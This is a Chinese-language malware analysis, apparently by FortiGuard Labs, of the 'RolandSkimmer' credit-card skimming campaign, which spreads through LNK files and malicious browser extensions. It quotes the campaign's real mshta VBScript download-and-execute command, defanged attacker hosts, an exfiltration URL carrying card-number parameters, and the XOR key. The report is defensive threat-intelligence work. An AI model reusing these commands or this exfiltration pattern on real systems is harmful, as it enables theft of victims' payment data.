RolandSkimmer：信用卡窃贼的无声作案过程揭秘

　　FORTIGUARD LABS 威胁研究

　　RolandSkimmer：信用卡窃贼的无声作案过程揭秘

　　作者：Cara Lin | 2025-04-02

　　受影响平台：Microsoft Windows

　　受影响用户：Microsoft Windows

　　威胁影响：非法收集受害者的敏感信息

　　安全等级：高危

　　网页版信用卡盗刷一直以来都是普遍且长期存在的安全威胁，以强大的适应性和随时间不断演进的能力而著称。FortiGuard Labs 近期观察到一起名为“RolandSkimmer”的复杂攻击活动。该活动因其有效载荷中嵌入的特有字符串“Rol@and4You”而得名。此次攻击的主要目标为保加利亚用户，代表着新一波针对 Chrome、Edge 和 Firefox 浏览器的恶意扩展所引发的信用卡盗刷攻击正在肆虐。

　　此次攻击活动是通过一个精心构造且具有欺骗性的 LNK 文件发起。该文件内嵌混淆脚本，旨在对受害者系统建立持久且隐蔽的访问权限。一旦成功嵌入，该恶意软件便会悄无声息地从受影响用户的系统中持续收集和窃取敏感的财务数据，而且通常成功躲避检测。

　　初始感染媒介

　　攻击者首先分发名为“faktura_3716804.zip”的恶意压缩包。用户解压后，会看到一个伪装成普通快捷方式的“faktura_1065170.lnk.”文件，该文件表面无害但实际包含恶意代码加载功能。

　　该快捷方式会秘密执行以下隐藏命令：

　　C:\WiNDOws\SYsTEM32\MShTA.exe vbscript:execute("SeT mi1=CReATeobjECt(\"msxmL2.SErverXMlHTtp.6.0\"):mi1.OpEN \"geT\",\"Hxxp://iNVsetmX[.]cOM/ipa.AsPX\",faLSe:mi1.SEnD():rANdOMize:R=INt(rnD*99999):ExECute(REpLAce(mI1.REsponSEtEXt,\"#\", R)):")(wiNDoW.ClosE)

　　随后，“ipa.AsPX”页面会被重定向至 URL“hxxp://invsetmx[.]com/n.jpg”。尽管该 URL 具有“.jpg”扩展名，但它实际上包含了一个经混淆处理的 VBScript 有效载荷。该脚本会启动一个连续的连接循环，不断轮询攻击者的服务器，以查找由特定分隔符“-@-”标记的命令。一旦接收到指令，该脚本便会对接收到的十六进制数据进行解码，并执行相应的恶意指令。

　　攻击工作流

　　通过 HTTP 响应传递的已编码 VBScript 由原始进程直接执行，无需将任何文件写入磁盘。我们从服务器“invsetmx[.]com”获取了攻击者的脚本，其中所有有效负载均使用“.dll”扩展名保存。下文详细介绍了已解码脚本所执行的活动。

　　首先，该脚本会检查受感染主机环境，查看特定路径中是否存在 Adobe、Firefox、Roaming 和 Chrome 文件夹。

　　随后，该脚本会执行一系列广泛的系统侦查活动，通过查询硬件详细信息全面了解受害者系统，包括 CPU 规格、内存大小以及操作系统信息等关键数据。收集到的这些情报，不但能够指导攻击者执行下一步有针对性的攻击行动，同时还能帮助攻击者准确洞察受感染主机，以避免在虚拟机或沙箱环境中浪费资源。

　　攻击者针对浏览器扩展实施定向攻击，从域名"http://fzhivka-001-site1.btempurl.com"下载包含扩展配置与恶意脚本的附加组件。攻击载荷按浏览器类型分类存储：Chrome 浏览器相关文件为 2ch1.rar 至 2ch3.rar，Edge浏览器对应 2eg1.rar 至 2eg3.rar 压缩包。所有文件均采用 XOR 编码加密，需使用"andromeda"密钥进行解密操作。

　　以下步骤揭示了针对 Microsoft Edge 浏览器扩展实施的攻击全过程。攻击者将解码的内容保存至目录“%APPDATA%\..\Local\s2ch97”，其中包含恶意扩展的关键组件：“manifest.json”、“background.js”和“background2.js”。这些文件负责配置扩展并执行其后台活动。

　　攻击者利用一个恶意的 Edge 浏览器扩展程序作为其在感染链、持久化机制及数据窃取过程中的关键组件。该扩展程序伪装成一个名为“禁用内容安全策略(Disable Content Security Policy)的合规工具，声称可绕过网站的 CSP(内容安全策略)防护。这种欺骗性的命名手法不仅掩盖其隐藏的恶意意图，还能确保该扩展程序能够与目标网站兼容。

　　该扩展程序的“manifest.json”文件明确请求包括 declarativeNetRequest(允许扩展程序拦截并篡改浏览器发出的网络请求)等一系列广泛且极具侵入性的权限：

　　declarativeNetRequest —— 允许扩展程序拦截和篡改浏览器发出的网络请求。

　　browsingData —— 允许操纵或擦除浏览数据，包括 Cookie、缓存和历史记录等。

　　tabs —— 启用对浏览器选项卡的控制，允许打开、关闭和监控用户访问的任何选项卡的内容。

　　存储 —— 允许扩展程序在用户的设备上进行本地存储和数据检索。

　　这种非法的权限组合揭示了一种精心设计的攻击战术，旨在全面支配用户的浏览器，将一个原本为方便用户而设计的工具彻底转变为用于监视、窃取和欺骗的秘密武器。

　　攻击者将“background.js”文件作为内容脚本注入受害者访问的每个网页中，其主要功能包括使用唯一标识符跟踪受害者并执行恶意代码。

　　为生成该唯一标识符，攻击者会根据当前的时间戳(包括日期、小时、分钟、秒和毫秒)创建一个名为 key2 的值。格式示例：“21.3.25-164532eg2”。这个标识符会被持久地存储在浏览器的本地存储中，以便攻击者能够跨不同会话跟踪同一用户。

接着，脚本会从名为“kuka”的本地存储键中检索一个加密的有效载荷。为执行这个有效载荷，脚本会故意注入一个格式错误的 HTML 标签 —— ，而非有效的 

标签。这种故意的拼写错误会导致加载错误，从而触发 onerror 事件处理器。一旦触发，该处理器会立即评估并执行在 background2.js 中定义的任意 JavaScript。

　　background2.js 脚本负责恶意浏览器扩展的持久性工作。该脚本利用高度混淆的 JavaScript函数 yori1 和 yori2 来动态构建远程 URL。这些函数会从远程恶意服务器“hxxps://exmkleo[.]com”上检索新的脚本，从而使恶意有效载荷能够持续更新。

　　检索到的有效载荷(即经过混淆处理的 JavaScript 代码片段)以"kuka"为键名存储于浏览器本地存储中。

　　从“hxxps://exmkleo[.]com”下载的恶意脚本负责监视用户的交互行为，特别关注表单提交、浏览活动以及信用卡数据。这些恶意脚本会监视 DOM 元素中的输入字段，寻找包含敏感支付信息字段，如信用卡号，会尤为关注符合标准信用卡编号规则的信息，例如以 4 开头的 Visa 卡和以 5 开头的 MasterCard 卡。

　　一旦检测到潜在的信用卡数据，该脚本会动态绑定至表单提交与按钮点击事件，于数据提交前精确截取用户输入信息。为实现数据外泄，它利用隐藏的元素进行传输，并追加唯一标识字符串"Rol@and4You"用于被盗数据追踪或校验。通过随机化 URL 路径与隐藏元素的组合式隐匿技术，可有效规避安全设备检测，显著提升数据窃取成功率。

　　一旦捕获数据，该脚本会向其命令和控制(C2)服务器发送 HTTPS 请求，并在 URL 中包含特定参数(S：站点、D：数据和 N：信用卡号)：

　　hxxps://bg3dsec[.]com/?S=-&D=?&N=

　　然后，攻击者通过执行以下复杂操作来实现持久化设置。值得注意的是，它们通常不会直接篡改或修改合法的 Edge 浏览器二进制文件，而是将合法的 Microsoft Edge 可执行文件(msedge.exe)复制到隐藏文件夹(%APPDATA%\Edge SxS)中。

　　此次攻击的关键组件在于恶意构建的 LNK 文件，其中包含以下参数：

　　--load-extension=”%LOCALAPPDATA%\s2ch97” ----mark-non-secure-as=disabled.

　　LNK 文件触发 “s2ch97” 文件夹中恶意浏览器扩展和脚本配置的加载。为了完成欺骗，攻击者从桌面和任务栏中删除了合法的 Edge 快捷方式，并用这些篡改后的恶意快捷方式取而代之，进而使受害者在不知不觉中启用受感染的浏览器环境。

　　攻击者针对 Mozilla Firefox 浏览器采用了不同的攻击手段，并利用了一系列名为“as1.rar”至“as6.rar”的下载文件实施攻击。

　　这些解码后的 RAR 文件展示一个完整的恶意 Firefox 扩展组件及其支持脚本的集合。每个文件各司其职，分别负责模拟合法扩展环境及强制安装扩展程序等不同的工作。

　　as1.rar：其中的 JSON 文件描述了两个 Mozilla Firefox 浏览器扩展：Greasemonkey 和Tampermonkey。这两个扩展允许用户通过运行小型 JavaScript 脚本自定义网页的外观或行为。

　　as2.rar：Mozilla Firefox 使用的压缩文件，用于在用户配置文件中存储有关已安装扩展的元数据

　　as3.rar：此 JSON 文件包括内置扩展和用户已安装的扩展，以及版本、类型、权限和文件路径等详细信息。在启动期间，Firefox 使用此文件来加载和管理其扩展。

　　as4.rar：包含设置 Firefox 首选项。

　　as5.rar：真正的 tampermonkey.xpi 文件(版本 4.7.5788)。

　　as6.rar：此压缩包中包含一个恶意脚本，专门为流行的用户脚本管理器 Tampermonkey 而设计，以便实现自动导入。安装后，该脚本即能窃取表单数据、登录凭证以及信用卡信息。解码后的服务器标识符“kok1”与“hxxps://exmkleo[.]com”相对应，攻击者从中下载一个类似于 Edge 攻击过程中使用的脚本。

　　通过结合运用这些文件，攻击者能够模拟出一个完全有效的 Firefox 用户配置文件，且已预安装并可正常运行 Tampermonkey 扩展。当这些文件被复制到受害者的环境中时，恶意软件会确保Firefox 在启动时自动启用攻击者所植入的恶意扩展程序。

　　完成浏览器的所有相关设置后，mshta.exe 将被终止。

　　在审查托管原始 LNK 文件的远程服务器时，我们发现了几个受害者日志文件。这些文件为十六进制编码，记录了受害者环境中完整的感染过程。

　　这些日志包含状态消息，例如：

　　“mz out， roaming in， ch in” —— 表示目标环境检查未发现 Firefox 安装程序，但检测到 Roaming 文件夹和 Chrome 浏览器。

　　“eg found...desk lnk ok” —— 确认 Edge 存在且已将恶意 LNK 文件成功置于目标系统桌面。

　　这些日志信息清晰地表明，恶意软件能够依据目标系统的具体环境执行自适应性操作，并据此灵活地定制其感染路径。

　　总结

　　“RolandSkimmer”攻击彰显了基于 LNK 文件的威胁日益复杂化，展示了攻击者如何利用合法的系统工具和脚本功能来实现隐蔽性、持久性和数据泄露。此次攻击活动显著依赖于恶意浏览器扩展作为其感染链的核心组件，从而能够长期访问并持续窃取用户的敏感数据，包括信用卡信息。

　　攻击者精心制作了 JavaScript 有效载荷、具有误导性的 manifest 文件以及经混淆处理的 VBScripts，以保持跨会话的持久性并成功逃避检测。为有效降低此类感染的风险，用户应避免打开未知的 LNK 文件，特别是那些通过电子邮件或来自非信任来源传递的文件。同时，组织还应持续限制或监控未经验证的浏览器扩展的使用，并部署能够检测异常脚本活动的安全工具。

　　　资料来源于网络，详情请点击：无线网络（WLAN）（https://www.fortinet.com/cn/products/wireless-access-points）